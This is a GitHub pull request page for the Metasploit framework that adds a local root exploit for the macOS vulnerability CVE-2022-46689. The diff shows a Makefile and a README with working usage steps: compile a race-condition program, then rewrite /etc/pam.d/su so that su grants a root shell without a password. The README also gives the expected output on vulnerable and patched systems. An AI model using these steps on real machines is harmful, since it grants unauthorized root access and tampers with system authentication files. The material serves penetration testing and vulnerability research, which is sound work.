Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CVE-2022-46689 macOS dirty cow #17415

Merged
merged 10 commits into from
Feb 2, 2023
Merged

Add CVE-2022-46689 macOS dirty cow #17415

Show file tree
Hide file tree
Changes from 1 commit
Commits
Show all changes
10 commits
Select commit Hold shift + click to select a range
ce260f5
Add CVE-2022-46689 macOS dirty cow
timwr Dec 26, 2022
057f046
Updated license file
jheysel-r7 Feb 1, 2023
595f34f
Merge branch 'master' into mac_dirty_cow
jheysel-r7 Feb 1, 2023
6037936
Update LICENSE
jheysel-r7 Feb 1, 2023
3c7cbf6
Updated default payload
jheysel-r7 Feb 1, 2023
076ffbc
Merge branch 'mac_dirty_cow' of github.com:timwr/metasploit-framework…
jheysel-r7 Feb 1, 2023
f4c5632
Cleaned up license file
jheysel-r7 Feb 1, 2023
4de5e44
Documentation
jheysel-r7 Feb 2, 2023
88caedd
Fixed license
jheysel-r7 Feb 2, 2023
1f224fd
Rapid7 compiled binary
jheysel-r7 Feb 2, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
8 changes: 8 additions & 0 deletions external/source/exploits/CVE-2022-46689/Makefile
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@

all:
clang -o switcharoo vm_unaligned_copy_switch_race.c

install:
mkdir -p ../../../../data/exploits/CVE-2022-46689/
cp switcharoo ../../../../data/exploits/CVE-2022-46689/exploit

44 changes: 44 additions & 0 deletions external/source/exploits/CVE-2022-46689/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,44 @@
Get root on macOS 13.0.1 with [CVE-2022-46689](https://support.apple.com/en-us/HT213532) (macOS equivalent of the Dirty Cow bug), using the testcase extracted from [Apple's XNU source](https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c).

https://worthdoingbadly.com/macdirtycow/

## Usage
On a macOS 13.0.1 / 12.6.1 (or below) machine, run:

```
clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su
```

You should get:

```
% ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
RO mapping was modified
% su
sh-3.2#
```

Tested on macOS 13 beta (22A5266r) with SIP off (it should still work with SIP on).

If your system is fully patched (macOS 13.1 / 12.6.2), it should instead read:

```
$ ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure
```

and running `su` should still ask for a password.

Thanks to Sealed System Volume, running this on any file on the /System volume only modifies the file temporarily: It's reverted on reboot. Running it on a file on a writeable volume will preserve the modification after a reboot.

## Credits

- Ian Beer of Project Zero for finding the issue. Looking forward to your writeup!
- Apple for the test case. (I didn't change anything: I just added the command line parameter to control what to overwrite.)
- [SSLab@Gatech](https://gts3.org/assets/papers/2020/jin:pwn2own2020-safari-slides.pdf) for the trick to disable password checking using `/etc/pam.d`.
Loading